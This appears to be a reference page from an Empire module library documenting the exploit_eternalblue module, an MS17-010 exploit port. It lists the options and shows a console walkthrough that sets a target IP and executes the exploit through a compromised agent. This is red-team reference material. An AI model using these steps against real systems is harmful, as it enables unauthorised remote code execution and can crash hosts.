Invoke-EternalBlue - Empire Module

This page contains detailed information about how to use the powershell/exploitation/exploit_eternalblue Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-EternalBlue
Module: powershell/exploitation/exploit_eternalblue
Source code [1]: empire/server/modules/powershell/exploitation/exploit_eternalblue.yaml
Source code [2]: empire/server/modules/powershell/exploitation/exploit_eternalblue.py
MITRE ATT&CK: T1210
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: No

Port of MS17_010 Metasploit module to powershell. Exploits targeted system and executes specified shellcode. Windows 7 and 2008 R2 supported. Potential for a BSOD.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the exploit_eternalblue module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the exploit_eternalblue module:

Agent
Agent to run module on.

InitialGrooms
Number of Initial Grooms.
Default value: 12.

MaxAttempts
Number of times to try exploit (increment grooms by 5 each time).

Shellcode
Custom shellcode to inject, 0xaa,0xab,... format.

Target
IP or Hostname of target.

Exploit_eternalblue Example Usage

---

Here's an example of how to use the exploit_eternalblue module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/exploitation/exploit_eternalblue

 Author       Sean Dillon <sean.dillon [at] risksense.com>                           
              Dylan Davis <dylan.davis [at] risksense.com>Equation Group             
              [email protected] (e0x70i)                                              
 Background   False                                                                  
 Comments     https://github.com/RiskSense-Ops/MS17-010                              
              https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternal 
              blue                                                                   
              http://threat.tevora.com/eternal-blues/                                
 Description  Port of MS17_010 Metasploit module to powershell. Exploits targeted    
              system and executes specified shellcode. Windows 7 and 2008 R2         
              supported. Potential for a BSOD                                        
 Language     powershell                                                             
 Name         powershell/exploitation/exploit_eternalblue                            
 NeedsAdmin   False                                                                  
 OpsecSafe    False                                                                  
 Techniques   http://attack.mitre.org/techniques/T1210                               


,Record Options-,-------,----------,-----------------------------------,
| Name          | Value | Required | Description                       |
|---------------|-------|----------|-----------------------------------|
| Agent         |       | True     | Agent to run module on.           |
|---------------|-------|----------|-----------------------------------|
| InitialGrooms | 12    | True     | Number of Initial Grooms          |
|---------------|-------|----------|-----------------------------------|
| MaxAttempts   | 1     | True     | Number of times to try exploit    |
|               |       |          | (increment grooms by 5 each time) |
|---------------|-------|----------|-----------------------------------|
| Shellcode     |       | True     | Custom shellcode to inject,       |
|               |       |          | 0xaa,0xab,... format.             |
|---------------|-------|----------|-----------------------------------|
| Target        |       | True     | IP or Hostname of target          |
'---------------'-------'----------'-----------------------------------'

(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set InitialGrooms 12
[*] Set InitialGrooms to 12
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set MaxAttempts value
[*] Set MaxAttempts to value
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Shellcode ..shellcode..
[*] Set Shellcode to ..shellcode..
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Target 192.168.100.1
[*] Set Target to 192.168.100.1
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors

---

• Sean Dillon
• Dylan Davis Equation Group
• [email protected] (e0x70i)

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/exploitation/exploit_eternalblue.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/exploitation/exploit_eternalblue.py
• https://github.com/RiskSense-Ops/MS17-010
• https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
• http://threat.tevora.com/eternal-blues/
• http://attack.mitre.org/techniques/T1210

See Also

---

Check also the following modules related to this module:

• powershell/exploitation/exploit_jenkins
• powershell/exploitation/exploit_jboss
• powershell/exploitation/invoke_spoolsample
• python/exploit/web/jboss_jmx

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.